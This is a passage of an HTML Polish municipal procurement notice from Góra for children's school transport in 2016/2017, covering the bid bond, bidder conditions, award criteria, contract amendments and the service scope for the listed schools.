24.Świadczona usługa będzie wykonywana zgodnie z warunkami przedmiotowej Specyfikacji Istotnych Warunków Zamówienia oraz umową stanowiącą załącznik do niniejszej SIWZ..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>V</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających:</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li>Zamawiający przewiduje możliwość udzielenia zamówień uzupełniających:
Dla części I zamówienia: do wartości 10 % wartości zamówienia podstawowego na zasadach opisanych w art. 67 ust.1 pkt. 6 ustawy Prawo zamówień publicznych (t. j. Dz. U. z 2015 r., poz. 2164).
Ewentualne zamówienia uzupełniające będą polegały na powtórzeniu tego samego rodzaju zamówienia, wykraczającego poza zakres ilościowy określony w zamówieniu podstawowym, tj. na usłudze dowozu dzieci z terenu gminy Góra do placówek oświatowych na podstawie biletów miesięcznych szkolnych oraz biletów miesięcznych dla opiekunów (Zamawiający przewiduje 11 opiekunów).

Dla części II zamówienia: do wartości 10 % wartości zamówienia podstawowego na zasadach opisanych w art. 67 ust.1 pkt. 6 ustawy Prawo zamówień publicznych (t. j. Dz. U. z 2015 r., poz. 2164).
Ewentualne zamówienia uzupełniające będą dotyczyły świadczenia usługi dowozu dzieci z terenu Gminy Góra do placówek oświatowych, wykraczającej poza zakres ilościowy określony w zamówieniu podstawowym na wyznaczonych przez Wykonawcę trasach.</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 60.10.00.00-9, 60.00.00.00-0.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1.W postępowaniu ustanowiono obowiązek wniesienia wadium  w wysokości: 
Dla części I postępowania  w wysokości 5 000,00 zł (słownie: pięć tysięcy złotych 00/100 groszy)
Dla części II postępowania  w wysokości - 10 000,00 złotych (słownie: dziesięć tysięcy złotych 00/100 groszy)
2. Wadium wnosi się przed upływem terminu na  składanie ofert. 
3. Wadium może być wnoszone w jednej lub kilku następujących formach: 
-pieniądzu ( przelewem na konto),
-poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo -kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym, 
-gwarancjach bankowych,
-gwarancjach ubezpieczeniowych, 
-poręczeniach udzielanych przez podmioty, o których mowa w art. 6 b ust. 5 pkt. 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (t.j. Dz. U. z 2014 r., poz. 1804)
4. Jeżeli wykonawca wnosi wadium w formie innej niżeli pieniądz, załącza do oferty kopię dokumentu wadialnego, a jego oryginał deponuje w kasie  Zamawiającego (pok. 24)  przed terminem złożenia ofert, tj. przed 
30.05.2016 r. przed godz. 12.00. Wadium wniesione w pieniądzu należy wpłacić przelewem na konto 
PKO BP S.A.  45 1020 5226 0000 6202 0497 0226 z dopiskiem: ,,wadium na Organizację dowozu dzieci do placówek oświatowych część nr...,,
5. Wadium wniesione w pieniądzu zamawiający przechowuje na rachunku bankowym. 
6. Wadium powinno obejmować cały okres związania z ofertą. 
7. Za termin wniesienia wadium uważa się datę wpłynięcia środków na konto zamawiającego. 
8. Wykonawca, którego oferta nie będzie zabezpieczona wadium wniesionym we właściwej formie, terminie i kwocie zostanie wykluczony z przedmiotowego postępowania. 
9. Zamawiający zwróci lub zatrzyma wadium zgodnie z art. 46 ustawy. 
10. Jeżeli wadium jest wnoszone w formie innej niżeli pieniądz,  zapisy dokumentu wadialnego winny zabezpieczać w pełni interes Zamawiającego w zakresie sytuacji zatrzymania wadium, opisanych w ustawie Prawo zamówień publicznych.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, że Wykonawca spełnia warunek posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli wykonawca posiada aktualną licencję na wykonywanie krajowego transportu drogowego osób, zgodnie z ustawą z dnia 6 września 2001 r. o transporcie drogowym (t.j. Dz. U. z 2013 r., poz. 1414 z późn. zm.).

Do wykazania spełniania pozostałych warunków udziału w postępowaniu Zamawiający uzna za właściwe złożenie oświadczenia o spełnianiu warunków udziału w postępowaniu, wskazanych przez ustawodawcę w art. 22 ust. 1 ustawy Prawo zamówień publicznych (t.j. Dz. U. z 2015 r., poz. 2164)</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Do wykazania spełniania warunku udziału w postępowaniu Zamawiający uzna za właściwe złożenie oświadczenia o spełnianiu warunków udziału w postępowaniu, wskazanych przez ustawodawcę w art. 22 ust. 1 ustawy Prawo zamówień publicznych (t.j. Dz. U. z 2015 r., poz. 2164)</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Do wykazania spełniania warunku udziału w postępowaniu Zamawiający uzna za właściwe złożenie oświadczenia o spełnianiu warunków udziału w postępowaniu, wskazanych przez ustawodawcę w art. 22 ust. 1 ustawy Prawo zamówień publicznych (t.j. Dz. U. z 2015 r., poz. 2164)</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Do wykazania spełniania warunku udziału w postępowaniu Zamawiający uzna za właściwe złożenie oświadczenia o spełnianiu warunków udziału w postępowaniu, wskazanych przez ustawodawcę w art. 22 ust. 1 ustawy Prawo zamówień publicznych (t.j. Dz. U. z 2015 r., poz. 2164)</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Do wykazania spełniania warunku udziału w postępowaniu Zamawiający uzna za właściwe złożenie oświadczenia o spełnianiu warunków udziału w postępowaniu, wskazanych przez ustawodawcę w art. 22 ust. 1 ustawy Prawo zamówień publicznych (t.j. Dz. U. z 2015 r., poz. 2164)</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Dokumenty wskazane w pkt 6 przedmiotowej SIWZ.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 97</li>
<li>2 - Czas podstawienia pojazdu zamiennego - 3</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Dla części I postępowania: 1. Zmiana postanowień zawartej umowy może nastąpić za zgodą obu stron wyrażoną na piśmie pod rygorem nieważności takiej zmiany.
2. Zakazuje się istotnych zmian postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy, chyba że Zamawiający przewidział możliwość dokonania takiej zmiany w ogłoszeniu o zamówieniu lub SIWZ oraz określił warunki takiej zmiany.
3. Zamawiający dopuszcza możliwość zmiany ustaleń zawartej umowy w stosunku do treści oferty Wykonawcy o których mowa w art. 144 ustawy PZP w następujących przypadkach :
a) zmiany  obowiązującej stawki podatku VAT - zmianie podlega tylko część wynagrodzenia, która nie została jeszcze zafakturowana, 
b) wystąpienia zdarzeń wymuszających przerwę w realizacji zamówienia niezależnych od Wykonawcy,
c) wprowadzenie lub zmiana zgłoszonych w ofercie części usług wykonywanych przy udziale Podwykonawcy, za uprzednią zgodą Zamawiającego,
d) zmiana terminu realizacji zamówienia,
e) przekształcenie którejkolwiek ze stron umowy, 
f) zmiany personelu Wykonawcy i Zamawiającego, za uprzednią zgodą Zamawiającego (np. osoby odpowiedzialne za realizację zamówienia itp.)
g) innych niezbędnych zmian pod warunkiem, że są korzystne dla Zamawiającego,
h) rozszerzenie zakresu usługi o dzieci dojeżdżające z innych miejscowości, niewymienionych  w postępowaniu, jeżeli takowe okoliczności nastąpią w roku szkolnym. Wówczas cena za bilet zostanie ustalona na podstawie cennika Wykonawcy przy uwzględnieniu zniżek w wysokościach wynikających z ustawy z dnia 20 czerwca 1992 roku o uprawnieniach do ulgowych przejazdów środkami publicznego transportu zbiorowego (tekst jednolity Dz. U. z 2012, poz. 1138 z późn. zm.). 
Dla części II postępowania: 
1. Zmiana postanowień zawartej umowy może nastąpić za zgodą obu stron wyrażoną na piśmie pod rygorem nieważności takiej zmiany.
2. Zakazuje się istotnych zmian postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy, chyba że Zamawiający przewidział możliwość dokonania takiej zmiany w ogłoszeniu o zamówieniu lub SIWZ oraz określił warunki takiej zmiany.
3. Zamawiający dopuszcza możliwość zmiany ustaleń zawartej umowy w stosunku do treści oferty Wykonawcy o których mowa w art. 144 ustawy PZP w następujących przypadkach :
a) zmiany  obowiązującej stawki podatku VAT - zmianie podlega tylko część wynagrodzenia, która nie została jeszcze zafakturowana, 
b) wystąpienia zdarzeń wymuszających przerwę w realizacji zamówienia niezależnych od Wykonawcy,
c) wprowadzenie lub zmiana zgłoszonych w ofercie części usług wykonywanych przy udziale Podwykonawcy, za uprzednią zgodą Zamawiającego,
d) zmiana terminu realizacji zamówienia,
e) przekształcenie którejkolwiek ze stron umowy, 
f) zmiany personelu Wykonawcy i Zamawiającego, za uprzednią zgodą Zamawiającego (np. osoby odpowiedzialne za realizację zamówienia itp.)
g) innych niezbędnych zmian pod warunkiem, że są korzystne dla Zamawiającego.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.gora.com.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miasta i Gminy w Górze, ul. Mickiewicza 1, 56-200 Góra, pokój nr 203..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 30.05.2016 godzina 12:00, miejsce: Urząd Miasta i Gminy w Górze, ul. Mickiewicza 1, 56-200 Góra, pokój nr 101- sekretariat, I piętro budynku..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Część 1- dowozy dzieci do placówek oświatowych na podstawie biletów miesięcznych szkolnych w okresie od 01 września 2016 r. do 31 grudnia 2016 r. na utworzonych przez Wykonawcę liniach regularnych..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> .  Przewozy będą świadczone w I semestrze roku szkolnego 2016/2017, okresie od 01 września 2016 r. do 31 grudnia 2016 r., we wszystkie dni nauki szkolnej, tj. w dni powszednie z wyjątkiem sobót, świąt i innych dni ustawowo wolnych od pracy, a także przerw w realizacji zajęć dydaktyczno - wychowawczych, określonych na podstawie przepisów Rozporządzenia Ministerstwa Edukacji Narodowej i Sportu z dnia 18.04 2002 r. w sprawie organizacji roku szkolnego (Dz. U z 2002 r. nr 46 poz. 432 z późn. zm.)  na utworzonych przez Wykonawcę liniach regularnych, z pierwszeństwem przejazdu dzieci i młodzieży z imiennym, szkolnym biletem miesięcznym oraz opiekunów z biletem miesięcznym (cena biletów zostanie ustalona w niniejszym postępowaniu). 
2.  Prognozowana łączna liczba uczniów dojeżdżających co miesiąc do placówek oświatowych wynosi: 569, szacunkowa liczba opiekunów:11.
3. Przedmiot zamówienia obejmuje dowóz uczniów wraz z opiekunami do niżej wskazanych placówek oświatowych, a także odwóz do miejsca zamieszkania po zakończeniu zajęć:
a) Szkoła Podstawowa nr 1 im. Bolesława Prusa w Górze - ul. M. Konopnickiej 2, ul. Piastów nr 34;
b) Szkoła Podstawowa nr 3 im. Władysława Broniewskiego w Górze - ul. Poznańska 2, ul. Podwale 20;
c) Gimnazjum nr 1 im. Marii Skłodowskiej - Curie w Górze -ul. Szkolna 2;
d) Gimnazjum nr 2 im. Mikołaja Kopernika w Górze - ul. Poznańska 2a;
e) Przedszkole Publiczne nr 1 w Górze im. Marii Konopnickiej, ul. Żeromskiego 15;
f) Przedszkole Publiczne nr 3 w Górze im. Jasia i Małgosi - ul. Piastów 7, oddział Stara Góra 15; 
g) Zespół Szkoła Podstawowa i Przedszkole im. Władysława Reymonta w Witoszycach - Witoszyce 10;
h) Zespół Szkolno - Przedszkolny z Oddziałami Integracyjnymi im. 55 Poznańskiego Pułku Piechoty 
    w Glince, - Glinka 6;
i) Zespół Szkoła Podstawowa, Gimnazjum i Przedszkole im. św. Huberta w Czerninie - ul. Szkolna 2;
j) Zespół Szkoła Podstawowa i Przedszkole im. Janusza Korczaka w Ślubowie- Ślubów 25 i 54;
k) Specjalny Ośrodek Szkolno-Wychowawczy w Wąsoszu (dzieci niepełnosprawne)- ul. Korczaka 6
 (dowóz do SOSW w Wąsoszu dzieci posiadających orzeczenie o niepełnosprawności).
Szczegółowy wykaz szkół stanowi załącznik nr 1A do SIWZ oraz wykaz ilościowy dzieci wg poszczególnych miejscowości załącznik nr 1 D do SIWZ.
4. Usługa obejmuje dowozy dzieci z terenu gminy Góra (z wyznaczonych miejsc przystankowych) wraz z opiekunami (jeden opiekun na każdy pojazd), do placówek oświatowych zlokalizowanych na obszarze gminy Góra i gminy Wąsosz* (*dowóz dzieci niepełnosprawnych do Specjalnego Ośrodka Szkolno-Wychowawczego w Wąsoszu). Zamówienie obejmuje również odwiezienie dzieci wraz z opiekunami po zakończeniu zajęć szkolnych do miejsca zamieszkania (do wyznaczonych miejsc przystankowych).
5.Zamawiający, we własnym zakresie zapewni dla przewożonych dzieci jednego opiekuna na każdy pojazd Wykonawcy. Szacunkowa liczba opiekunów: 11 osób.
6.Wykonawca zobligowany jest do uzyskania wszelkich niezbędnych zezwoleń dla świadczenia usług objętych przedmiotem zamówienia. 
7.Wykonawca wystawiać będzie dla przewożonych dzieci bilety miesięczne szkolne ulgowe zgodnie z ustawą z dnia 20 czerwca 1992 roku o uprawnieniach do ulgowych przejazdów środkami publicznego transportu zbiorowego (t.j. Dz. U. z 2012 r., poz. 1138 z późn. zm.).
8.Wykonawca zobowiązany jest do uzyskania wszystkich zezwoleń wynikających z przepisów prawa, niezbędnych do świadczenia usług objętych przedmiotem umowy na co najmniej 7 dni przed rozpoczęciem ich świadczenia. Wykonawca winien spełniać wszystkie warunki niezbędne do otrzymania dopłat przysługujących przewoźnikom wykonującym regularne przewozy osób, zgodnie z ustawą o uprawnieniach do ulgowych przejazdów środkami publicznego transportu zbiorowego (t. j. Dz. U. z 2012 r., poz. 1138 z późn. zm.). 
9. Imienna lista uczniów, dla których zostaną zakupione bilety szkolne ulgowe (z podziałem na poszczególne placówki oświatowe i miejscowości) zostanie podana do wiadomości Wykonawcy przez Zamawiającego do 20 dnia każdego miesiąca, poprzedzającego miesiąc na który bilety zostaną zakupione, w formie pisemnej. Dopuszcza się przekazanie listy za pomocą faksu lub poczty elektronicznej z niezwłocznym potwierdzeniem pisemnym.
10. Przekazywane listy w stosunku do oferty  mogą różnić się ilością dzieci dowożonych, która mogła ulec zmianie w stosunku do ilości przedstawionej w ofercie. Ilość dzieci może ulegać w okresach miesięcznych zwiększeniu bądź zmniejszeniu ze względu na migrację ludności. W przypadku zmiany ilości dzieci dojeżdżających Wykonawca dostosuje trasy i liczbę kursów do potrzeb sprawnego dowozu dzieci do placówek na warunkach podanych w ofercie. Z tytułu zmniejszenia ilości dowożonych uczniów Zamawiający nie przewiduje ponoszenia dodatkowych opłat, a Wykonawca nie będzie rościł pretensji ani żądał rekompensaty finansowej, jeżeli wartość zamówienia będzie mniejsza niż szacowana przez Zamawiającego.
10.1. Zamawiający zastrzega sobie prawo do zwrócenia biletów już zakupionych najpóźniej do 5 dnia miesiąca na który zostały zakupione, bez ponoszenia kosztu ich zakupu. 	            
10.2. Wykonawca zobowiązany jest przekazać bilety:
a) dla dzieci - dyrektorom poszczególnych placówek oświatowych najpóźniej na 5 dni przed rozpoczęciem każdego miesiąca,
b) dla opiekunów - do siedziby Zamawiającego, tj. Urzędu Miasta i Gminy Góra, pok. nr 4-5 najpóźniej na 5 dni przed rozpoczęciem każdego miesiąca. 
11. Szczegółowe informacje zawarto w załącznikach:
1A -  wykaz ilościowy dzieci wg poszczególnych miejscowości i placówek oświatowych, 
1B - przykładowy rozkład dowozu i odwozu,
1C - godziny rozpoczęcia i zakończenia zajęć w placówkach oświatowych,
1D - wykaz uczniów wg miejscowości,
12.Wykonawca zobowiązany jest do ścisłego stosowania się do godzin dowozu i odwozu ustalonych w rozkładzie dowozu i odwozu i zatrzymywania się w wyznaczonych miejscach, z zastrzeżeniem że dzieci muszą być dowiezione do szkół najpóźniej na 5 minut przed rozpoczęciem zajęć lekcyjnych i nie wcześniej niż 40 minut przed rozpoczęciem zajęć lekcyjnych.
13. Zamawiający zastrzega, że okres oczekiwania dzieci na odwóz do miejsc zamieszkania (wyznaczonych miejsc przystankowych) po zakończonych zajęciach nie będzie dłuższy niż 1 godzina. 
14. Kierowca pojazdu będzie informował dzieci, na którym przystanku się aktualnie znajdują.
15. Zamawiający zastrzega sobie możliwość odstępstw od podanego rozkładu dowozów i odwozów, stanowiącego załącznik do SIWZ i umowy, z powodu zmiany planu lekcji, ilości dzieci, likwidacji szkół, zmiany organizacji roku szkolnego, odpracowania dni wolnych, itp. W przypadku odpracowania zajęć szkolnych w innym dniu wolnym od zajęć Wykonawca zobowiązany jest zapewnić przewóz zgodnie z rozkładem jazdy ustalonym przez Zamawiającego. Zamawiający zastrzega sobie możliwość wprowadzenia na określone dni innego niż ustalony rozkład dowozów i odwozów, w szczególności przed rozpoczęciem roku szkolnego, po powiadomieniu Wykonawcy w terminie co najmniej 7 dni przed dniem, w którym nastąpi zmiana.
16. Zmiany w rozkładzie jazdy oraz ilości dzieci/młodzieży szkolnej dla których wystawiane są bilety szkolne w danym miesiącu możliwe są na podstawie pisemnego zatwierdzenia przez Zamawiającego. 
17. Wykonawca winien posiadać odpowiednią ilość sprawnych technicznie pojazdów (szczególną uwagę należy zwrócić na instalację grzewczą w okresie zimowym) zdolnych do przewiezienia dzieci i opiekunów dowożonych na danej trasie ( szacunkową ilość wskazano w zał. nr 1 A i 1 D do SIWZ). Przy dowożeniu kursami ogólnodostępnymi Wykonawca musi uruchomić w razie potrzeby dodatkowe kursy, aby zapewnić dzieciom bezpieczne i higieniczne  warunki w czasie dowozu. Wykonawca zobowiązuje się do utrzymania taboru w wielkości umożliwiającej prawidłowe wykonanie umowy oraz że usługi będą świadczone środkami transportu przystosowanymi do przewozu młodzieży szkolnej spełniającymi wszystkie wymagania bezpieczeństwa, higieny i kodeksu drogowego, przez osoby mające odpowiednie uprawnienia do świadczenia tych usług.                                   
18. Wykonawca zobligowany jest zapewnić wszystkim przewożonym uczniom miejsca siedzące.   
19. W razie uszkodzenia lub awarii pojazdu wykonującego przewóz, Wykonawca zobowiązuje się podstawić sprawny technicznie zastępczy pojazd w ciągu maksymalnie 90 minut. Jest to termin maksymalny. Jego skrócenie będzie premiowane w ramach kryteriów oceny ofert.
20. Wykonawca jest obowiązany posiadać aktualne badania techniczne i ubezpieczenia OC pojazdów uczestniczących w dowozach oraz zobligowany jest ubezpieczyć również przewożone w ramach umowy osoby od następstw nieszczęśliwych wypadków. Polisy ubezpieczenia Wykonawca przedkłada na wezwanie Zamawiającego.
21. Zamawiający nie bierze żadnej odpowiedzialności za wypadki i zdarzenia jakiegokolwiek typu, w wyniku których nastąpi uszkodzenie ciała, śmierć czy szkoda materialna, spowodowana działalnością Wykonawcy. Wykonawca ponosi pełną odpowiedzialność za szkody wynikające z wypadków lub innych zdarzeń wynikłych w czasie realizacji usługi stanowiącej przedmiot umowy, dlatego Wykonawca oświadcza, że posiada ubezpieczenie odpowiedzialności cywilnej w zakresie prowadzonej działalności o wartości co najmniej odpowiadającej wartości całkowitego wynagrodzenia Wykonawcy wskazanego w niniejszej umowie. Wykonawca gwarantuje bezpieczeństwo osób i mienia podczas wykonywania usług przewozu osób. 
22. Wykonawca na wezwanie Zamawiającego przedkłada dokumenty potwierdzające posiadanie ubezpieczenia odpowiedzialności OC w zakresie prowadzonej działalności. 
23.Wykonawca nie bierze żadnej odpowiedzialności za dzieci/młodzież, które nie stawią się w oznaczonej godzinie w miejscu przystanku lub postoju pojazdu.
24. Wykonawca zapozna się ze stanem dróg, na których realizowane będą przewozy. Trasa powinna przebiegać możliwie najkrótszą drogą.
25.  Wykonawca zobowiązany jest do przestrzegania zakazu palenia w pojeździe.
26.Wykonanie przedmiotu umowy winno być zgodne z przepisami prawa, w szczególności z:
a)	ustawą z dnia 15 listopada 1984 r. Prawo przewozowe (t.j. Dz. U. z 2015 r., poz. 915), 
b)	ustawą z dnia 6 września 2001 r. o transporcie drogowym (t.j. Dz. U. z 2013 r., poz. 1414 z późn. zm.), 
c)	ustawą z dnia 20 czerwca 1997r. Prawo o ruchu drogowym (t.j. Dz. U. z 2012 r., poz. 1137 z późn. zm.),
d)	ustawą z dnia 16 grudnia 2010 r. o publicznym transporcie zbiorowym. (t.j. Dz. U. z 2015 r., poz. 1440 z póżn. zm.)
e)	ustawą z dnia 20 czerwca 1992 r. o uprawnieniach do ulgowych przejazdów środkami publicznego transportu zbiorowego (t.j. Dz. U. z 2012 r., poz. 1138 z późn. zm.).

27.Zaleca się wykonawcom bardzo dokładne zapoznanie się z warunkami wykonywania przedmiotu zamówienia w celu prawidłowego oszacowania przez Wykonawcę kosztów i ryzyka usługi, oraz uzyskania i zweryfikowania wszelkich danych jakie mogą być niezbędne w przygotowaniu oferty 
i podpisaniu umowy na wykonanie przedmiotu zamówienia.
28.Świadczona usługa będzie wykonywana zgodnie z warunkami przedmiotowej Specyfikacji.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 60.10.00.00-9, 60.00.00.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 97</li>
<li>2. Czas podstawienia pojazdu zamiennego - 3</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Część 2- dowozy dzieci do placówek oświatowych w okresie od 02 stycznia do 2017 r. do 30 czerwca 2017 r. na  trasach wyznaczonych przez Wykonawcę wg ustalonego rozkładu jazdy stanowiącego załącznik nr 1 B do SIWZ..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Przewozy będą świadczone w II semestrze w roku szkolnym 2016/2017, okresie od 02 stycznia 2017 r. do 30 czerwca 2017 r., we wszystkie dni nauki szkolnej., tj. w dni powszednie z wyjątkiem sobót, świąt i innych dni ustawowo wolnych od pracy, a także przerw w realizacji zajęć dydaktyczno - wychowawczych, określonych na podstawie przepisów Rozporządzenia Ministerstwa Edukacji Narodowej i Sportu z dnia 18.04 2002 r. w sprawie organizacji roku szkolnego (Dz. U z 2002 r. nr 46 poz. 432 z późn. zm.)  na wyznaczonych trasach dostosowanych do ustalonego rozkładu jazdy. Trasa powinna przebiegać możliwie najkrótszą, optymalną drogą. Przykładowy rozkład jazdy zawiera zał. nr 1B. 
